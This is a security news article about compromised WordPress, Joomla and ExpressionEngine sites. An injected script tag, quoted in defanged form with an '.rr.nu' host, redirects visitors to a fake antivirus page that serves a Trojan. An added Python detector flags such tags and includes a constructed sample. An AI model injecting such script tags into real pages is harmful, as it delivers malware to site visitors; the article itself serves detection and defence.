The majority of the sites that have been compromised are running on the popular WordPress blogging platform; however, after a little digging we found that ExpressionEngine and Joomla sites are also being targeted.
According to Websense, the following malicious code is being injected at the bottom of pages, right before the closing body tag (minus the spaces):
< sc ript src=”hxxp://ionis90landsi.rr.nu/mm.php ?d=1 “>
Once a user attempts to visit a website that’s been compromised, their browser is redirected multiple times before ultimately landing on a fake antivirus software webpage resembling a Windows Explorer window that pretends to scan the visitor’s computer and detect multiple malware infections.
“The fake antivirus then prompts visitors to download and run their ‘antivirus tool’ to remove the supposedly found Trojans,” Websense explained in a blog post. “The executable is itself the Trojan.”
The initial link that’s being injected into websites is an “.rr.nu” domain and the landing page is a “.de.lv” domain; however, the landing page keeps changing.
Website owners are advised to do their best to protect their sites by using strong FTP credentials and researching known vulnerabilities within their selected CMS and related plug-ins and/or extensions.
You can check if your website has been compromised by using online scanners like Sucuri’s SiteCheck Scanner.
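For a local check of your own page source, the following added example (not code from Websense, Sucuri or this article's authors) looks for the pattern described above: a script tag whose host ends in the ".rr.nu" or ".de.lv" suffixes named here, or any external script sitting directly before the closing body tag. The function names, the `trusted_hosts` parameter and the sample hosts are assumptions made up for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domain suffixes the article names for the injected link and the landing page.
SUSPECT_SUFFIXES = (".rr.nu", ".de.lv")
# A <script src=...> (closed or not) that is the last thing before </body>.
TAIL_SCRIPT = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?\s*([^\"'\s>]+)[^>]*>"
    r"\s*(?:</script\s*>)?\s*</body\s*>", re.IGNORECASE)

class ScriptSrcCollector(HTMLParser):
    """Record (line number, src) for every <script> tag that has a src."""
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.found.append((self.getpos()[0], src.strip()))

def host_of(src):
    """Lower-cased host of a script URL, or '' for relative paths."""
    return (urlparse(src).hostname or "").lower()

def scan_page(html, trusted_hosts=()):
    """Return findings as (line, src, reason) tuples for one page."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    tail = TAIL_SCRIPT.search(html)
    tail_src = tail.group(1) if tail else None
    findings = []
    for line, src in collector.found:
        host = host_of(src)
        if not host or host in trusted_hosts:
            continue  # relative (same-site) or explicitly trusted script
        if host.endswith(SUSPECT_SUFFIXES):
            findings.append((line, src, "suspect-domain"))
        elif src == tail_src:
            findings.append((line, src, "external-script-before-body-close"))
    return findings

# Constructed sample page; the hosts below are made up for this example.
SAMPLE = """<html><body>
<script src="/js/site.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<p>Post content</p>
<script src="http://constructed-sample.rr.nu/mm.php?d=1"></script></body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE, trusted_hosts={"cdn.example.org"}):
        print(finding)
```

Because the landing page keeps changing, treat the suffix list as a starting point and review every "external-script-before-body-close" finding against the scripts you actually installed.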